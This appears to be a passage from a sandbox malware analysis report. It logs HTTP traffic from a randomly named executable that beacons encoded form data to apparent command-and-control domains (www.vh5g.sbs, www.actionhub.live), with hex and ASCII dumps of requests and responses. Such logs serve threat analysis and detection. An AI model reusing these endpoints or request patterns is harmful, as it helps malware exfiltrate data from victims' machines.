                                                                                                                          Data Raw: 56 30 3d 75 53 31 63 38 74 55 50 34 30 66 75 36 7a 4e 79 47 5a 42 42 6d 4c 42 6e 6a 45 79 59 42 51 32 59 4b 67 4f 69 6e 34 56 7a 5a 36 35 7a 37 79 74 34 48 69 58 37 47 50 34 74 77 4e 74 59 46 39 4a 64 73 41 36 78 69 5a 51 51 44 74 44 68 6b 74 6c 56 65 36 42 6a 6e 38 49 72 4b 58 5a 63 5a 2f 6e 4f 41 6d 47 68 2f 67 6d 41 6c 72 46 6d 64 4b 59 36 4e 42 30 41 6b 57 38 79 45 57 72 73 43 30 6f 65 43 65 55 74 74 47 4c 33 74 48 6b 77 34 30 77 71 47 59 56 59 58 31 52 4d 58 57 44 30 32 44 46 72 56 64 56 48 7a 53 52 68 44 44 7a 6b 6a 58 53 4a 42 7a 58 72 71 34 30 32 41 48 38 54 36 6a 72 54 44 32 42 56 69 57 30 6e 32 50 6f 72 4d 65 5a 33 38 51 67 70 32 63 78 4f 6b 38 48 50 4e 32 2b 5a 65 33 57 59 4c 4e 69 61 75 42 4a 63 6f 6d 50 2b 2b 41 31 58 76 36 50 75 55 70 45 6f 30 42 63 39 45 2b 45 32 63 64 35 45 30 7a 30 39 75 7a 43 55 31 7a 32 64 62 33 4b 59 46 50 31 33 61 42 46 62 6a 55 64 46 46 4e 38 38 33 4e 57 58 50 50 56 44 69 6a 49 64 67 59 56 62 57 7a 50 78 30 63 66 79 6b 69 38 65 51 37 61 6b 41 6e 49 75 37 35 78 [TRUNCATED]
                                                                                                                          Data Ascii: V0=uS1c8tUP40fu6zNyGZBBmLBnjEyYBQ2YKgOin4VzZ65z7yt4HiX7GP4twNtYF9JdsA6xiZQQDtDhktlVe6Bjn8IrKXZcZ/nOAmGh/gmAlrFmdKY6NB0AkW8yEWrsC0oeCeUttGL3tHkw40wqGYVYX1RMXWD02DFrVdVHzSRhDDzkjXSJBzXrq402AH8T6jrTD2BViW0n2PorMeZ38Qgp2cxOk8HPN2+Ze3WYLNiauBJcomP++A1Xv6PuUpEo0Bc9E+E2cd5E0z09uzCU1z2db3KYFP13aBFbjUdFFN883NWXPPVDijIdgYVbWzPx0cfyki8eQ7akAnIu75xmBOpX+/XeRVRzmNtZOJHpr+AwgCxedzlM/CJhz76lIo6jHHx2MfCP/0wuHrsV0s2P1ldREH9rhL++H80b2xIaEII0L4xQGVU/ze6w/eBv3SCbDie8oxxpmuZ8ImSaQUy9toY/ekMeEDQP7UzuTaFwFnJFcfo+a3JBz8Fd5rHJVlv9Llrn+e5g+AFf7eHfr0GomyHDtYvjRpFiKFkkHmJ6iH1ZGkYEFn2vZMmNsF9HRA1LU6zTRWYSbUtQIkqTXms0rQVhaALU11K1fahWWqiJYOIc+M38M/OOYIev+hKHt1hwYvB770EuivAEuPtl/m22xEeBUhC5wzf6t4xy5E4P9zYxT9rEAlYGR36zBeyWu6dihB2swF+hwVxwusV8mD1uosTIvWrFAVVLbzguuChPiYYH9Y6IKmuZtP8zdvVm22tKQSYQTP0xr6VFqOIh0aVtK7R/bzRb8N0TQZbJQhWWdJCuHfSqVB4Gc1yiJ139H8cReNTM040LwZNuy6mXgaz8OdsdPmJoD/sI3yUiTc67+z+9cvrT3NkyNAnWmdQ5U8QKjD2Uk8i6Cij0ik+XndSZaOi2k4UavGPg3KVfHrs591DMyTRz7xyeRJMzB4HAcv5cYJLrgGNagKsTowe2nXmeC5t9d+S8/xFoynmkFw6ioeoJyX5UGb4eV [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:16:14.310547113 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:14 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EphGCK5zEapVcsMazb4%2BhKK2kF6pJwHVrseWHWiOgTlYk4m4shLgWHopE4np19nPmpseoz9PM6gH4%2BR3l8aSjYs1mqcqKwXlRWQwALV36unrY5nFw8xxbGKgaJXsdlI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9027832bea7fa306-YUL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=17716&min_rtt=17716&rtt_var=8858&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10741&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body><
                                                                                                                          Jan 15, 2025 18:16:14.310611963 CET15INData Raw: 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: /html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449892188.114.97.3804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:16.193290949 CET379OUTGET /54nj/?V0=jQd8/d8A1xfb/FB4a5ld7s51nRiuWU3OCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JhvpvAlNBW96dL3eN6Dv39YB+Yc5uDns7m3I=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:16:16.860996008 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:16 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0IDSNzfz4AqQWpCfrjoiT3%2BBucdDiIfHiTx47wUn%2BrY4zSer0FvLFuRbb80gIzoSGV%2BGzJKrz0af4QLnAo5olsBSbqxEzz3AkZ5CjjIKQ8Hc4rwQ4X%2BuKHSANKeiMY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9027833bc969c591-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8179&min_rtt=8179&rtt_var=4089&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=379&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></
                                                                                                                          Jan 15, 2025 18:16:16.861011028 CET14INData Raw: 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.44998067.223.117.189804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:30.163305044 CET657OUTPOST /gq43/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.actionhub.live
                                                                                                                          Origin: http://www.actionhub.live
                                                                                                                          Referer: http://www.actionhub.live/gq43/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 73 39 31 48 6e 31 44 69 42 2f 78 46 64 30 54 4e 46 52 76 47 4c 49 71 45 49 6d 43 53 65 59 6d 44 38 6b 76 43 6f 55 51 2f 34 2f 4b 64 4d 52 6b 6f 34 6e 4d 2f 48 6f 53 6e 73 4d 47 6d 33 68 67 46 6c 4c 35 77 77 55 69 6d 50 46 47 38 76 66 49 75 58 4e 4a 2b 43 65 6c 4f 68 6a 4d 4d 6f 6b 7a 58 4e 42 76 34 66 44 6a 31 76 31 36 41 35 4e 73 6e 5a 77 36 52 4c 4b 67 70 2b 31 37 70 66 31 44 67 6d 6b 42 30 58 39 2b 31 6b 6a 31 6a 68 31 56 4d 63 34 37 32 66 63 48 58 36 45 45 63 56 42 6a 66 79 66 67 46 34 38 34 38 44 39 47 61 51 78 50 6e 48 6c 77 72 76 39 74 54 45 72 70 73 52 4a 4e 4f 36 67 3d 3d
                                                                                                                          Data Ascii: V0=s91Hn1DiB/xFd0TNFRvGLIqEImCSeYmD8kvCoUQ/4/KdMRko4nM/HoSnsMGm3hgFlL5wwUimPFG8vfIuXNJ+CelOhjMMokzXNBv4fDj1v16A5NsnZw6RLKgp+17pf1DgmkB0X9+1kj1jh1VMc472fcHX6EEcVBjfyfgF4848D9GaQxPnHlwrv9tTErpsRJNO6g==
                                                                                                                          Jan 15, 2025 18:16:30.759963989 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:30 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 32106
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:16:30.759979963 CET224INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                                                                                          Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/o
                                                                                                                          Jan 15, 2025 18:16:30.759990931 CET1236INData Raw: 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f
                                                                                                                          Data Ascii: wl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css"> ... FABLES CUSTOM C
                                                                                                                          Jan 15, 2025 18:16:30.760009050 CET1236INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62
                                                                                                                          Data Ascii: div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <div class="container">
                                                                                                                          Jan 15, 2025 18:16:30.760019064 CET1236INData Raw: 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                                                                          Data Ascii: > </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconphone"></sp
                                                                                                                          Jan 15, 2025 18:16:30.760029078 CET672INData Raw: 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67
                                                                                                                          Data Ascii: vDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span> </button>
                                                                                                                          Jan 15, 2025 18:16:30.760039091 CET1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                                                                                          Jan 15, 2025 18:16:30.760049105 CET224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul c
                                                                                                                          Jan 15, 2025 18:16:30.760059118 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: lass="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a cla
                                                                                                                          Jan 15, 2025 18:16:30.760070086 CET224INData Raw: 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: ="header2-dark.html">Header 2 Dark</a></li> </ul> </li> <li><a c
                                                                                                                          Jan 15, 2025 18:16:30.764921904 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.44999967.223.117.189804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:32.713108063 CET677OUTPOST /gq43/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.actionhub.live
                                                                                                                          Origin: http://www.actionhub.live
                                                                                                                          Referer: http://www.actionhub.live/gq43/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 73 39 31 48 6e 31 44 69 42 2f 78 46 64 55 6a 4e 48 32 37 47 4e 6f 71 48 48 47 43 53 48 6f 6d 50 38 6b 6a 43 6f 57 38 76 2f 4e 2b 64 4e 30 41 6f 37 6d 4d 2f 47 6f 53 6e 6e 73 48 73 39 42 67 65 6c 4c 31 53 77 52 61 6d 50 46 43 38 76 61 73 75 58 61 31 39 43 4f 6c 4d 34 54 4d 4b 73 6b 7a 58 4e 42 76 34 66 43 48 62 76 31 79 41 35 64 63 6e 62 56 61 57 56 61 67 71 35 31 37 70 62 31 44 6b 6d 6b 42 47 58 38 69 54 6b 6c 70 6a 68 30 6c 4d 66 70 37 31 47 4d 47 39 6e 30 46 75 59 6a 6d 48 30 74 6c 45 77 75 6b 53 42 76 61 49 52 33 43 39 57 55 52 38 39 39 4a 67 5a 73 67 59 63 4b 77 48 68 69 6e 42 43 73 36 38 34 67 54 68 70 65 74 45 4f 42 33 59 50 4b 6f 3d
                                                                                                                          Data Ascii: V0=s91Hn1DiB/xFdUjNH27GNoqHHGCSHomP8kjCoW8v/N+dN0Ao7mM/GoSnnsHs9BgelL1SwRamPFC8vasuXa19COlM4TMKskzXNBv4fCHbv1yA5dcnbVaWVagq517pb1DkmkBGX8iTklpjh0lMfp71GMG9n0FuYjmH0tlEwukSBvaIR3C9WUR899JgZsgYcKwHhinBCs684gThpetEOB3YPKo=
                                                                                                                          Jan 15, 2025 18:16:33.364851952 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:33 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 32106
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:16:33.364873886 CET1236INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                                                                                          Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
                                                                                                                          Jan 15, 2025 18:16:33.364886999 CET1236INData Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                          Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
                                                                                                                          Jan 15, 2025 18:16:33.364901066 CET672INData Raw: 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 20 66 61 62 6c
                                                                                                                          Data Ascii: glish</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
                                                                                                                          Jan 15, 2025 18:16:33.364914894 CET1236INData Raw: 61 62 6c 65 73 2d 69 63 6f 6e 65 6d 61 69 6c 22 3e 3c 2f 73 70 61 6e 3e 20 45 6d 61 69 6c 3a 20 44 65 73 69 67 6e 40 64 6f 6d 61 69 6e 2e 63 6f 6d 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: ables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables Navigation --><div class="fables-navigation fables-main-background-color py-3
